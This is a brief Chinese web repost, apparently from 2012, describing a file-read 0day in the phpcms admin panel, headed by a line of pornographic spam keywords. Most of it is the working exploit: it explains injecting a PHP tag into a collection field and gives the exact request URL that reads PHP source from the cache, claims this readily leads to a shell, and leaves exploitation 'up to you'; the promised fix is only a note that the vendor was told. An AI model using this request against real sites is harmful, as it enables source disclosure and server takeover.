欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

phpcms后臺(tái)普通用戶讀文件0day的分析以及修復(fù)方法

  發(fā)布時(shí)間:2012-08-17 16:52:15   作者:佚名   我要評(píng)論
phpcms后臺(tái)普通用戶讀文件0day及修復(fù)
后臺(tái)采集里設(shè)置采集模塊中title 或者其他的內(nèi)容都可以 設(shè)置為<?php[內(nèi)容]?>
然后用下面的代碼就可以讀取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=xxxx
拿到源基本拿到shell不難了。具體如何利用看大家自己了。(別跟我說只會(huì)讀數(shù)據(jù)庫連接文件,并且還不能連),反正我是可以拿到shell。
修復(fù):已提交給官方,等待補(bǔ)丁

相關(guān)文章

最新評(píng)論